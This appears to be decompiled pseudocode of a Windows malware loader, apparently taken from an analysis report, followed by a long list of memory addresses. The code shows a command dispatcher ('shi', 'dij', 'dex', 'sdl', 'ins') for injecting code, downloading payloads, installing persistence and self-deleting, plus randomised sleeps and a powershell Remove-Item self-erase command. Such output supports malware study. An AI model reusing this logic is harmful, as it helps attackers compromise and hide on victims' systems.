				 *(_t935 + 0xb8) = _t698;
				 *((short*)(_t935 + 0xbe)) = 0x405;
				_t701 =  *(_t935 + 0xb8) & 0x00000000 | "file_entry_point";
				 *(_t935 + 0xb8) = _t701;
				 *(_t935 + 0xb0) = 0x10;
				E0000021E21EF2FEBA50(_t932, _t935 + 0xb0, _t923, _t932, _t935, _t977, _t983);
				if (( *(_t701 + 0xe) & r12w) != 0) goto 0xf2fea033;
				_t703 =  *(_t701 + 8) & 0xffffffff;
				if ( *_t703 != 0) goto 0xf2fea03d;
				r8d = 0;
				goto 0xf2fea04b;
				if ( *((char*)(_t703 + (_t946 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
				_t398 = E0000021E21EF2FE6400(_t740, _t935 + 0x288, _t703, _t932, (_t946 | 0xffffffff) + 1);
				if (_t935 + 0x240 - _t977 >= 0) goto 0xf2fea0d3;
				if (_t923 - _t935 + 0x240 > 0) goto 0xf2fea0d3;
				if (_t977 !=  *((intOrPtr*)(_t935 - 0x20))) goto 0xf2fea0b1;
				E0000021E21EF2FEB0F0(_t398 * (_t935 + 0x240 - _t923), _t935 - 0x30);
				_t978 =  *(_t935 - 0x28);
				 *(_t935 + 8) = _t978;
				 *(_t935 + 0x1d0) = _t978;
				if (_t978 == 0) goto 0xf2fea0d1;
				_t401 = E0000021E21EF2FEBCF0(_t703 >> 5 >> 0x3f, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t978, ((_t703 >> 5) + (_t703 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t935 - 0x30)), _t966);
				goto 0xf2fea10a;
				if (_t978 !=  *((intOrPtr*)(_t935 - 0x20))) goto 0xf2fea0ea;
				E0000021E21EF2FEB0F0(_t401, _t935 - 0x30);
				_t979 =  *(_t935 - 0x28);
				_t925 =  *((intOrPtr*)(_t935 - 0x30));
				 *(_t935 + 0x1d0) = _t979;
				 *(_t935 + 8) = _t979;
				if (_t979 == 0) goto 0xf2fea10a;
				_t403 = E0000021E21EF2FEBCF0(_t703 >> 5 >> 0x3f, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t979, _t935 + 0x240, _t966);
				_t980 = _t979 + 0x70;
				 *(_t935 - 0x28) = _t980;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t403, _t488, _t935 + 0x288), _t488, _t935 + 0x268), _t488, _t935 + 0x240);
				if (_t932 + 0x10 != _t983) goto 0xf2fe9d10;
				r12d =  *((intOrPtr*)(_t935 + 0x5e0));
				r13d = 3;
				r15d = 0;
				if (r12d != 1) goto 0xf2fea70b;
				if (_t925 != _t980) goto 0xf2fea279;
				r8d = E0000021E21EF3111C60(_t703 >> 5 >> 0x3f);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t490 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea1a7;
				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t703 >> 5) + (_t703 >> 5 >> 0x3f),  *(_t935 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t709 =  *((intOrPtr*)(_t935 - 0x78));
				if (_t709 - 0x10 < 0) goto 0xf2fea218;
				_t802 =  *((intOrPtr*)(_t936 + 0x70));
				if (_t709 + 1 - _t925 < 0) goto 0xf2fea213;
				if ((_t490 & 0x0000001f) != 0) goto 0xf2fea8bf;
				_t711 =  *((intOrPtr*)(_t802 - 8));
				if (_t711 - _t802 >= 0) goto 0xf2fea8b9;
				_t803 = _t802 - _t711;
				if (_t803 - 8 < 0) goto 0xf2fea8b3;
				if (_t803 - 0x27 > 0) goto 0xf2fea8ad;
				0xf310ba8c();
				 *((long long*)(_t935 - 0x78)) = 0xf;
				 *(_t935 - 0x80) = _t983;
				 *((char*)(_t936 + 0x70)) = 0;
				_t712 =  *((intOrPtr*)(_t935 - 0x38));
				if (_t712 - 0x10 < 0) goto 0xf2fe98ee;
				_t805 =  *((intOrPtr*)(_t935 - 0x50));
				if (_t712 + 1 - _t925 < 0) goto 0xf2fe98e9;
				if ((_t490 & 0x0000001f) != 0) goto 0xf2fea8d7;
				_t714 =  *((intOrPtr*)(_t805 - 8));
				if (_t714 - _t805 >= 0) goto 0xf2fea8d1;
				_t806 = _t805 - _t714;
				if (_t806 - 8 < 0) goto 0xf2fea8cb;
				if (_t806 - 0x27 > 0) goto 0xf2fea8c5;
				goto 0xf2fe98e6;
				r12d = 1;
				_t215 = _t935 + 0x10; // 0x13
				E0000021E21EF2FE5D10(_t535, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t215, _t925 + 0x28);
				_t934 =  *((intOrPtr*)(_t925 + 0x18));
				if (_t934 - 0x10 < 0) goto 0xf2fea29d;
				goto 0xf2fea2a0;
				_t744 =  *((intOrPtr*)(_t925 + 0x10));
				_t950 =  <  ? _t744 : 0xffffffff;
				_t599 =  <  ? _t744 : 0xffffffff;
				if (( <  ? _t744 : 0xffffffff) == 0) goto 0xf2fea2c8;
				if (E0000021E21EF310E7C0(_t490, _t925, "shi",  <  ? _t744 : 0xffffffff) != 0) goto 0xf2fea382;
				if (_t744 != 3) goto 0xf2fea382;
				r8d = 0x208;
				E0000021E21EF310E410(_t490, 0, 0x1000, _t535, 0xf320b2a0, "shi", _t925,  <  ? _t744 : 0xffffffff);
				E0000021E21EF3111C60(_t714);
				r9d = 0;
				_t224 = _t966 + 0x26; // 0x26
				r8d = _t224;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t935 + 0x170)) = _t714;
				 *((long long*)(_t935 + 0x178)) = _t714;
				 *((long long*)(_t935 + 0x180)) = _t714;
				E0000021E21EF3017F50(_t714, _t744, _t935 + 0x170, _t925, _t934, _t966);
				if ( *((intOrPtr*)(_t935 + 0x180)) == 0) goto 0xf2fea2e0;
				r13d = 3;
				_t232 = _t935 + 0x10; // 0x13
				E0000021E21EF2FE7390(_t714,  *((intOrPtr*)(_t935 + 0x170)),  *((intOrPtr*)(_t935 + 0x178)), _t232, 0xf31b0230);
				goto 0xf2fea618;
				if (_t934 - 0x10 < 0) goto 0xf2fea38d;
				goto 0xf2fea390;
				_t953 =  <  ? _t744 : 0xf31b0230;
				_t605 =  <  ? _t744 : 0xf31b0230;
				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea3b4;
				if (E0000021E21EF310E7C0(0, _t925, "dij",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea46f;
				if (_t744 != 3) goto 0xf2fea46f;
				asm("o16 nop [eax+eax]");
				r8d = 0x208;
				E0000021E21EF310E410(0, 0, 0x1000, _t535, 0xf320b2a0, "dij", _t925,  <  ? _t744 : 0xf31b0230);
				_t423 = E0000021E21EF3111C60(_t714);
				r9d = 0;
				_t241 = _t966 + 0x26; // 0x26
				r8d = _t241;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t935 + 0x158)) = _t714;
				 *((long long*)(_t935 + 0x160)) = _t714;
				 *((long long*)(_t935 + 0x168)) = _t714;
				E0000021E21EF3017F50(_t714, _t744, _t935 + 0x158, _t925, _t934, _t966);
				if ( *((intOrPtr*)(_t935 + 0x168)) == 0) goto 0xf2fea3d0;
				E0000021E21EF2FE7560(_t744,  *((intOrPtr*)(_t935 + 0x158)),  *((intOrPtr*)(_t935 + 0x160)), _t934, _t935, _t935 + 0x10, _t925 + 0x48);
				goto 0xf2fea618;
				if (_t934 - 0x10 < 0) goto 0xf2fea47a;
				goto 0xf2fea47d;
				_t956 =  <  ? _t744 : 0xf31b0230;
				_t611 =  <  ? _t744 : 0xf31b0230;
				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea49d;
				if (E0000021E21EF310E7C0(0, _t925, "dex",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea504;
				if (_t744 != 3) goto 0xf2fea504;
				r9d = 0;
				r8d = _t744 + 0x19;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				_t906 =  >=  ?  *((void*)(_t935 + 0x10)) : _t935 + 0x10;
				r8d =  *(_t935 + 0x20);
				if (E0000021E21EF301B91C(_t714, _t744, 0xf320b2a0,  >=  ?  *((void*)(_t935 + 0x10)) : _t935 + 0x10, _t934, _t925 + 0x48) == 0) goto 0xf2fea620;
				0xf301c460();
				goto 0xf2fea61c;
				if (_t934 - 0x10 < 0) goto 0xf2fea50f;
				goto 0xf2fea512;
				_t958 =  <  ? _t744 : 0xf31b0230;
				_t618 =  <  ? _t744 : 0xf31b0230;
				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea537;
				if (E0000021E21EF310E7C0(0, _t925, "sdl",  <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea537;
				r15d = 0;
				goto 0xf2fea552;
				if (_t744 - 3 >= 0) goto 0xf2fea545;
				r15d = 0;
				goto 0xf2fea552;
				r15d = 0;
				if ((r15d & 0xffffff00 | _t744 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
				if (_t934 - 0x10 < 0) goto 0xf2fea565;
				goto 0xf2fea568;
				_t960 =  <  ? _t744 : 0xf31b0230;
				_t625 =  <  ? _t744 : 0xf31b0230;
				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea58c;
				if (E0000021E21EF310E7C0(0, _t925, "ins",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea620;
				if (_t744 - 3 >= 0) goto 0xf2fea597;
				goto 0xf2fea5a1;
				_t440 = r15d & 0xffffff00 | _t744 - 0x00000003 > 0x00000000;
				if (_t440 != 0) goto 0xf2fea620;
				if ( *((intOrPtr*)(_t935 + 0x5d8)) == _t440) goto 0xf2fea5e8;
				r8d = E0000021E21EF3111C60(_t714);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t497 = r8d * 0x3e8;
				Sleep(??);
				E0000021E21EF2FE6100(0x28c1979 * r8d, _t497, _t935 + 0x10);
				goto 0xf2fea681;
				 *((char*)(_t936 + 0x20)) = 0;
				_t445 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t744, _t935 + 0x2b0, _t935 + 0x420, _t925, _t934, _t935 + 0x188, _t935 + 0x138, _t974);
				if (_t445 != 0) goto 0xf2fea8dd;
				goto 0xf2fea5ad;
				if (_t445 == 0) goto 0xf2fea620;
				 *((intOrPtr*)(_t925 + 0x68)) = r12d;
				_t715 =  *((intOrPtr*)(_t935 + 0x28));
				if (_t715 - 0x10 < 0) goto 0xf2fea66e;
				_t829 =  *((intOrPtr*)(_t935 + 0x10));
				if (_t715 + 1 - 0x1000 < 0) goto 0xf2fea669;
				if ((_t497 & 0x0000001f) != 0) goto 0xf2feaaaf;
				_t717 =  *((intOrPtr*)(_t829 - 8));
				if (_t717 - _t829 >= 0) goto 0xf2feaaa9;
				_t830 = _t829 - _t717;
				if (_t830 - 8 < 0) goto 0xf2feaaa3;
				if (_t830 - 0x27 > 0) goto 0xf2feaa9d;
				0xf310ba8c();
				 *((long long*)(_t935 + 0x28)) = 0xf;
				r15d = 0;
				 *(_t935 + 0x20) = 0xf31b0230;
				 *((intOrPtr*)(_t935 + 0x10)) = r15b;
				_t926 = _t925 + 0x70;
				if (_t926 != _t980) goto 0xf2fea280;
				r8d = E0000021E21EF3111C60(_t717);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea6cd;
				_t449 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t744,  *(_t935 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t449, r8d * 0x3e8, _t936 + 0x70), r8d * 0x3e8, _t935 - 0x50);
				goto 0xf2fe9742;
				r8d = E0000021E21EF3111C60(_t717);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t501 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea74a;
				E0000021E21EF2FEB260(0x28c1979 * r8d, _t744,  *(_t935 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t718 =  *((intOrPtr*)(_t935 - 0x78));
				if (_t718 - 0x10 < 0) goto 0xf2fea7bb;
				_t840 =  *((intOrPtr*)(_t936 + 0x70));
				if (_t718 + 1 - _t926 < 0) goto 0xf2fea7b6;
				if ((_t501 & 0x0000001f) != 0) goto 0xf2feada7;
				_t720 =  *((intOrPtr*)(_t840 - 8));
				if (_t720 - _t840 >= 0) goto 0xf2feada1;
				_t841 = _t840 - _t720;
				if (_t841 - 8 < 0) goto 0xf2fead9b;
				if (_t841 - 0x27 > 0) goto 0xf2fead95;
				0xf310ba8c();
				 *((long long*)(_t935 - 0x78)) = 0xf;
				 *(_t935 - 0x80) = 0xf31b0230;
				 *((char*)(_t936 + 0x70)) = 0;
				_t721 =  *((intOrPtr*)(_t935 - 0x38));
				if (_t721 - 0x10 < 0) goto 0xf2fe98ee;
				_t843 =  *((intOrPtr*)(_t935 - 0x50));
				if (_t721 + 1 - _t926 < 0) goto 0xf2fe98e9;
				if ((_t501 & 0x0000001f) != 0) goto 0xf2feadbf;
				_t723 =  *((intOrPtr*)(_t843 - 8));
				if (_t723 - _t843 >= 0) goto 0xf2feadb9;
				_t844 = _t843 - _t723;
				if (_t844 - 8 < 0) goto 0xf2feadb3;
				if (_t844 - 0x27 > 0) goto 0xf2feadad;
				goto 0xf2fe98e6;
				r8d = E0000021E21EF3111C60(_t723);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				goto 0xf2fe9742;
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x2f0], xmm0");
				 *((long long*)(_t935 + 0x300)) = 0xf31b0230;
				r13d =  ==  ? r12d : r13d;
				 *((intOrPtr*)(_t926 + 0x68)) = r13d;
				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t744, _t935 + 0x2f0, _t926);
				 *((long long*)(_t936 + 0x20)) = _t935 + 0x2f0;
				0xf3014e20();
				_t725 = _t935 + 0x50;
				 *((long long*)(_t936 + 0x20)) = _t935 + 0x50;
				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t423 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t744, _t935 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)), _t934, _t935, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20, _t935 + 0x440), r8d * 0x3e8, _t935 - 0x70);
				 *((long long*)(_t935 - 8)) = 0xf31b0230;
				 *_t935 = 0xf31b0230;
				 *_t935 = 0xf;
				 *((long long*)(_t935 - 8)) = 0xf31b0230;
				 *((char*)(_t935 - 0x18)) = 0;
				r8d = 0;
				E0000021E21EF2FE6530(_t744, _t935 - 0x18, _t935 + 0x138, _t926, _t934, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20, _t935 + 0x00000440 | 0xffffffff);
				 *((long long*)(_t936 + 0x60)) = 0xf31b0230;
				 *((long long*)(_t936 + 0x68)) = 0xf31b0230;
				 *((long long*)(_t936 + 0x68)) = 0xf;
				 *((long long*)(_t936 + 0x60)) = 0xf31b0230;
				 *((char*)(_t936 + 0x50)) = 0;
				r8d = 0xa;
				E0000021E21EF2FE6400(_t744, _t936 + 0x50, "powershell", _t934, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20);
				GetCurrentProcessId();
				E0000021E21EF2FE9020(_t935 + 0x2d0);
				E0000021E21EF2FEB660(_t935 + 0x50, _t935 - 0x70, _t935 + 0x50);
				r8d = r8d ^ r8d;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t744, _t936 + 0x50, _t935 + 0x50, _t926, _t934, _t935, _t935 + 0x50, _t935 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t935 - 0x70), r8d * 0x3e8, _t935 + 0x2d0);
				r8d = 0x15;
				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "; Remove-Item -Path \"", _t926, _t935, _t725);
				r8d = 0;
				E0000021E21EF2FE82C0(_t744, _t936 + 0x50, _t935 - 0x18, _t926, _t934, _t935, _t725, _t935 + 0x00000440 | 0xffffffffffffffff);
				r8d = 8;
				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "\" -Force", _t926, _t935, _t725);
				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "\"", _t926, _t935, _t974);
				_t861 =  >=  ?  *((void*)(_t936 + 0x50)) : _t936 + 0x50;
				0xf301c460();
				__imp__CoUninitialize();
				ExitProcess(??);
			}






























































































                                        0x21ef2fe9913
                                        0x21ef2fe9918
                                        0x21ef2fe9923
                                        0x21ef2fe9933
                                        0x21ef2fe9939
                                        0x21ef2fe9951
                                        0x21ef2fe9958
                                        0x21ef2fe995f
                                        0x21ef2fe9966
                                        0x21ef2fe996e
                                        0x21ef2fe9971
                                        0x21ef2fe9979
                                        0x21ef2fe997c
                                        0x21ef2fe9984
                                        0x21ef2fe998c
                                        0x21ef2fe9993
                                        0x21ef2fe999e
                                        0x21ef2fe99a5
                                        0x21ef2fe99b3
                                        0x21ef2fe99b8
                                        0x21ef2fe99bd
                                        0x21ef2fe99c4
                                        0x21ef2fe99c7
                                        0x21ef2fe99cf
                                        0x21ef2fe99d3
                                        0x21ef2fe99d7
                                        0x21ef2fe99db
                                        0x21ef2fe99e2
                                        0x21ef2fe99f3
                                        0x21ef2fe99f9
                                        0x21ef2fe9a00
                                        0x21ef2fe9a0a
                                        0x21ef2fe9a15
                                        0x21ef2fe9a28
                                        0x21ef2fe9a2b
                                        0x21ef2fe9a2f
                                        0x21ef2fe9a36
                                        0x21ef2fe9a47
                                        0x21ef2fe9a49
                                        0x21ef2fe9a56
                                        0x21ef2fe9a65
                                        0x21ef2fe9a6b
                                        0x21ef2fe9a73
                                        0x21ef2fe9a78
                                        0x21ef2fe9a80
                                        0x21ef2fe9a85
                                        0x21ef2fe9a8b
                                        0x21ef2fe9a92
                                        0x21ef2fe9a98
                                        0x21ef2fe9a9f
                                        0x21ef2fe9aa9
                                        0x21ef2fe9ab2
                                        0x21ef2fe9ab7
                                        0x21ef2fe9abf
                                        0x21ef2fe9ac3
                                        0x21ef2fe9ac8
                                        0x21ef2fe9ad0
                                        0x21ef2fe9ad6
                                        0x21ef2fe9ae0
                                        0x21ef2fe9ae9
                                        0x21ef2fe9aef
                                        0x21ef2fe9af6
                                        0x21ef2fe9afc
                                        0x21ef2fe9b03
                                        0x21ef2fe9b0d
                                        0x21ef2fe9b13
                                        0x21ef2fe9b18
                                        0x21ef2fe9b1c
                                        0x21ef2fe9b1f
                                        0x21ef2fe9b23
                                        0x21ef2fe9b2a
                                        0x21ef2fe9b47
                                        0x21ef2fe9b4c
                                        0x21ef2fe9b50
                                        0x21ef2fe9b57
                                        0x21ef2fe9b59
                                        0x21ef2fe9b5c
                                        0x21ef2fe9b68
                                        0x21ef2fe9b89
                                        0x21ef2fe9b8c
                                        0x21ef2fe9b96
                                        0x21ef2fe9b9d
                                        0x21ef2fe9ba4
                                        0x21ef2fe9bac
                                        0x21ef2fe9bb0
                                        0x21ef2fe9bb4
                                        0x21ef2fe9bbd
                                        0x21ef2fe9bd9
                                        0x21ef2fe9bdc
                                        0x21ef2fe9be0
                                        0x21ef2fe9bf2
                                        0x21ef2fe9bf8
                                        0x21ef2fe9bfb
                                        0x21ef2fe9c13
                                        0x21ef2fe9c16
                                        0x21ef2fe9c20
                                        0x21ef2fe9c27
                                        0x21ef2fe9c2e
                                        0x21ef2fe9c36
                                        0x21ef2fe9c3e
                                        0x21ef2fe9c42
                                        0x21ef2fe9c4b
                                        0x21ef2fe9c67
                                        0x21ef2fe9c6a
                                        0x21ef2fe9c6e
                                        0x21ef2fe9c80
                                        0x21ef2fe9c8b
                                        0x21ef2fe9c93
                                        0x21ef2fe9c97
                                        0x21ef2fe9c9b
                                        0x21ef2fe9cb0
                                        0x21ef2fe9cb4
                                        0x21ef2fe9cd6
                                        0x21ef2fe9cdb
                                        0x21ef2fe9cf0
                                        0x21ef2fe9cf3
                                        0x21ef2fe9cfa
                                        0x21ef2fe9d00
                                        0x21ef2fe9d09
                                        0x21ef2fe9d12
                                        0x21ef2fe9d19
                                        0x21ef2fe9d20
                                        0x21ef2fe9d2b
                                        0x21ef2fe9d32
                                        0x21ef2fe9d38
                                        0x21ef2fe9d3f
                                        0x21ef2fe9d46
                                        0x21ef2fe9d51
                                        0x21ef2fe9d58
                                        0x21ef2fe9d5e
                                        0x21ef2fe9d65
                                        0x21ef2fe9d6c
                                        0x21ef2fe9d77
                                        0x21ef2fe9d7e
                                        0x21ef2fe9d89
                                        0x21ef2fe9d99
                                        0x21ef2fe9d9c
                                        0x21ef2fe9d9f
                                        0x21ef2fe9db0
                                        0x21ef2fe9db8
                                        0x21ef2fe9dc0
                                        0x21ef2fe9dc7
                                        0x21ef2fe9dd3
                                        0x21ef2fe9df5
                                        0x21ef2fe9df8
                                        0x21ef2fe9dff
                                        0x21ef2fe9e13
                                        0x21ef2fe9e1e
                                        0x21ef2fe9e24
                                        0x21ef2fe9e2a
                                        0x21ef2fe9e2c
                                        0x21ef2fe9e2f
                                        0x21ef2fe9e3d
                                        0x21ef2fe9e49
                                        0x21ef2fe9e58
                                        0x21ef2fe9e5b
                                        0x21ef2fe9e5e
                                        0x21ef2fe9e6f
                                        0x21ef2fe9e77
                                        0x21ef2fe9e7f
                                        0x21ef2fe9e86
                                        0x21ef2fe9e92
                                        0x21ef2fe9eb4
                                        0x21ef2fe9eb7
                                        0x21ef2fe9ebe
                                        0x21ef2fe9ed2
                                        0x21ef2fe9edd
                                        0x21ef2fe9ee3
                                        0x21ef2fe9ee9
                                        0x21ef2fe9eeb
                                        0x21ef2fe9eee
                                        0x21ef2fe9efc
                                        0x21ef2fe9f08
                                        0x21ef2fe9f17
                                        0x21ef2fe9f1a
                                        0x21ef2fe9f2e
                                        0x21ef2fe9f36
                                        0x21ef2fe9f3a
                                        0x21ef2fe9f41
                                        0x21ef2fe9f4d
                                        0x21ef2fe9f6f
                                        0x21ef2fe9f72
                                        0x21ef2fe9f79
                                        0x21ef2fe9f8d
                                        0x21ef2fe9f95
                                        0x21ef2fe9fa5
                                        0x21ef2fe9fa8
                                        0x21ef2fe9fab
                                        0x21ef2fe9fbc
                                        0x21ef2fe9fc4
                                        0x21ef2fe9fcc
                                        0x21ef2fe9fd3
                                        0x21ef2fe9fdf
                                        0x21ef2fea001
                                        0x21ef2fea004
                                        0x21ef2fea00b
                                        0x21ef2fea01f
                                        0x21ef2fea02a
                                        0x21ef2fea030
                                        0x21ef2fea036
                                        0x21ef2fea038
                                        0x21ef2fea03b
                                        0x21ef2fea049
                                        0x21ef2fea055
                                        0x21ef2fea064
                                        0x21ef2fea070
                                        0x21ef2fea09e
                                        0x21ef2fea0a4
                                        0x21ef2fea0a9
                                        0x21ef2fea0b1
                                        0x21ef2fea0bc
                                        0x21ef2fea0c6
                                        0x21ef2fea0cb
                                        0x21ef2fea0d1
                                        0x21ef2fea0d7
                                        0x21ef2fea0dd
                                        0x21ef2fea0e2
                                        0x21ef2fea0e6
                                        0x21ef2fea0ea
                                        0x21ef2fea0f1
                                        0x21ef2fea0f8
                                        0x21ef2fea104
                                        0x21ef2fea10a
                                        0x21ef2fea10e
                                        0x21ef2fea133
                                        0x21ef2fea13f
                                        0x21ef2fea145
                                        0x21ef2fea14c
                                        0x21ef2fea152
                                        0x21ef2fea159
                                        0x21ef2fea162
                                        0x21ef2fea16d
                                        0x21ef2fea180
                                        0x21ef2fea183
                                        0x21ef2fea187
                                        0x21ef2fea18e
                                        0x21ef2fea19f
                                        0x21ef2fea1a1
                                        0x21ef2fea1ae
                                        0x21ef2fea1c1
                                        0x21ef2fea1c7
                                        0x21ef2fea1d4
                                        0x21ef2fea1d9
                                        0x21ef2fea1e1
                                        0x21ef2fea1e6
                                        0x21ef2fea1ec
                                        0x21ef2fea1f3
                                        0x21ef2fea1f9
                                        0x21ef2fea200
                                        0x21ef2fea20a
                                        0x21ef2fea213
                                        0x21ef2fea218
                                        0x21ef2fea220
                                        0x21ef2fea224
                                        0x21ef2fea229
                                        0x21ef2fea231
                                        0x21ef2fea237
                                        0x21ef2fea241
                                        0x21ef2fea24a
                                        0x21ef2fea250
                                        0x21ef2fea257
                                        0x21ef2fea25d
                                        0x21ef2fea264
                                        0x21ef2fea26e
                                        0x21ef2fea274
                                        0x21ef2fea279
                                        0x21ef2fea284
                                        0x21ef2fea288
                                        0x21ef2fea28e
                                        0x21ef2fea296
                                        0x21ef2fea29b
                                        0x21ef2fea2a0
                                        0x21ef2fea2ab
                                        0x21ef2fea2af
                                        0x21ef2fea2b2
                                        0x21ef2fea2c2
                                        0x21ef2fea2cc
                                        0x21ef2fea2e2
                                        0x21ef2fea2ef
                                        0x21ef2fea2f4
                                        0x21ef2fea309
                                        0x21ef2fea30c
                                        0x21ef2fea30c
                                        0x21ef2fea319
                                        0x21ef2fea32e
                                        0x21ef2fea336
                                        0x21ef2fea33d
                                        0x21ef2fea344
                                        0x21ef2fea352
                                        0x21ef2fea35e
                                        0x21ef2fea360
                                        0x21ef2fea366
                                        0x21ef2fea378
                                        0x21ef2fea37d
                                        0x21ef2fea386
                                        0x21ef2fea38b
                                        0x21ef2fea397
                                        0x21ef2fea39b
                                        0x21ef2fea39e
                                        0x21ef2fea3ae
                                        0x21ef2fea3b8
                                        0x21ef2fea3c5
                                        0x21ef2fea3d2
                                        0x21ef2fea3df
                                        0x21ef2fea3e4
                                        0x21ef2fea3f9
                                        0x21ef2fea3fc
                                        0x21ef2fea3fc
                                        0x21ef2fea409
                                        0x21ef2fea41d
                                        0x21ef2fea425
                                        0x21ef2fea42c
                                        0x21ef2fea433
                                        0x21ef2fea441
                                        0x21ef2fea44d
                                        0x21ef2fea465
                                        0x21ef2fea46a
                                        0x21ef2fea473
                                        0x21ef2fea478
                                        0x21ef2fea484
                                        0x21ef2fea488
                                        0x21ef2fea48b
                                        0x21ef2fea49b
                                        0x21ef2fea4a1
                                        0x21ef2fea4a3
                                        0x21ef2fea4a6
                                        0x21ef2fea4b3
                                        0x21ef2fea4c7
                                        0x21ef2fea4d6
                                        0x21ef2fea4db
                                        0x21ef2fea4ed
                                        0x21ef2fea4fa
                                        0x21ef2fea4ff
                                        0x21ef2fea508
                                        0x21ef2fea50d
                                        0x21ef2fea519
                                        0x21ef2fea51d
                                        0x21ef2fea520
                                        0x21ef2fea530
                                        0x21ef2fea532
                                        0x21ef2fea535
                                        0x21ef2fea53b
                                        0x21ef2fea540
                                        0x21ef2fea543
                                        0x21ef2fea545
                                        0x21ef2fea554
                                        0x21ef2fea55e
                                        0x21ef2fea563
                                        0x21ef2fea56f
                                        0x21ef2fea573
                                        0x21ef2fea576
                                        0x21ef2fea586
                                        0x21ef2fea590
                                        0x21ef2fea595
                                        0x21ef2fea59e
                                        0x21ef2fea5a3
                                        0x21ef2fea5ab
                                        0x21ef2fea5b2
                                        0x21ef2fea5c5
                                        0x21ef2fea5c8
                                        0x21ef2fea5cc
                                        0x21ef2fea5d3
                                        0x21ef2fea5de
                                        0x21ef2fea5e3
                                        0x21ef2fea5e8
                                        0x21ef2fea609
                                        0x21ef2fea610
                                        0x21ef2fea616
                                        0x21ef2fea61a
                                        0x21ef2fea61c
                                        0x21ef2fea620
                                        0x21ef2fea628
                                        0x21ef2fea62d
                                        0x21ef2fea637
                                        0x21ef2fea63c
                                        0x21ef2fea642
                                        0x21ef2fea649
                                        0x21ef2fea64f
                                        0x21ef2fea656
                                        0x21ef2fea660
                                        0x21ef2fea669
                                        0x21ef2fea66e
                                        0x21ef2fea676
                                        0x21ef2fea679
                                        0x21ef2fea67d
                                        0x21ef2fea681
                                        0x21ef2fea688
                                        0x21ef2fea693
                                        0x21ef2fea6a6
                                        0x21ef2fea6a9
                                        0x21ef2fea6b4
                                        0x21ef2fea6c5
                                        0x21ef2fea6c7
                                        0x21ef2fea6d4
                                        0x21ef2fea6e7
                                        0x21ef2fea6fc
                                        0x21ef2fea706
                                        0x21ef2fea710
                                        0x21ef2fea723
                                        0x21ef2fea726
                                        0x21ef2fea72a
                                        0x21ef2fea731
                                        0x21ef2fea742
                                        0x21ef2fea744
                                        0x21ef2fea751
                                        0x21ef2fea764
                                        0x21ef2fea76a
                                        0x21ef2fea777
                                        0x21ef2fea77c
                                        0x21ef2fea784
                                        0x21ef2fea789
                                        0x21ef2fea78f
